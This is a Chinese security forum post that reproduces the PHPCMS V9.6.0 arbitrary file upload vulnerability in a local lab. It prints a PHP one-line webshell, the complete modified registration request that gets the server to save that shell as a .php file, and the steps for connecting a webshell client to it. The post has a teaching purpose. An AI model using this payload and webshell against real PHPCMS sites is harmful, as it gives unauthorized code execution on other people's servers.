首页
论坛
专栏
课程

分享:
### 漏洞复现 使用XAMPP搭建好环境,接着安装PHPCMS V9.6.0。 [PHPCMS V9.6.0 官方下载地址](http://bbs.phpcms.cn/thread-933447-1-1.html) 在phpcms根目录下写入一句话木马的txt记事本文件: ```<?php @eval($_POST['shell0']);?>``` ![](/upload/attach/201804/201804091754_AN4UEPCA95R6H3H.jpg) 路径为: http://localhost/phpcms/shell.txt ![](/upload/attach/201804/201804091754_YWK2SKC3PCBUMTE.jpg) 此时是txt记事本文件,解释器解析不了里面的PHP代码,所以用菜刀连接失败。 ![](/upload/attach/201804/201804091755_9KPSP89ESXERJAD.jpg) 打开主页找到注册页面,填写基本信息,提交用burpsuite抓包: ![](/upload/attach/201804/201804091755_UXDHQQAHN5KE2EU.jpg) ![](/upload/attach/201804/201804091755_A4V4EHNFHNN8B3Z.jpg) send to repeater: 修改request 请求包的payload: ``` siteid=1&modelid=1&username=usera&password=password&pwdconfirm=password&email=usera%40test.com&nickname=nichenga&info[content]=href=http://localhost/phpcms/shell.txt?.php#.jpg&dosubmit=1&protocol= ``` ![](/upload/attach/201804/201804091755_TXU9U6AZ6XWH74D.jpg) response标黄的部分就是返回的shell地址,注意上面我们抓取的modelid值原本为10,payload改成了数字1,目的就是为了在response中显示shell路径。 ``` http://localhost/phpcms/uploadfile/2018/0403/20180403044429440.php ``` 这个路径的文件就是PHP一句话小马: ![](/upload/attach/201804/201804091755_RDDMD83ZC44R6PD.jpg) 用菜刀连接成功: ![](/upload/attach/201804/201804091756_YX9YBWE9SYQUJ6J.jpg) ### 注:用PHP7版本测试上面的一句话木马是连接不了的,使用PHP5可以连接成功。 漏洞分析参考p0wd3r的[PHPCMS v9.6.0 任意文件上传漏洞分析](https://www.seebug.org/vuldb/ssvid-92930)

上一篇 :
下一篇 :
讨论 (1)
静河流 2018-4-10
 举报
之前一直用DVWA最新版,通过白盒审计的方式讲解漏洞的原理与利用,但是后来觉得freebuf上一个作者已经写的非常详细了,http://www.freebuf.com/articles/web/119467.html,我没有必要在重新用最新版DVWA重新改写下,最新版一些细节的改动只需要自己去看看就好,这篇我只写了利用部分,seebug上看到一位作者对这个漏洞的分析写的非常好,所以我也不打算在重复造轮子,关于漏洞分析在文章最下面已经给出了,新手可以先看我给的freebuf上作者写的这篇入门,在看我的这篇对漏洞的复现,然后去看p0wd3r对漏洞的分析。
沪ICP备16048531号-1
沪公网安备 31011502006611号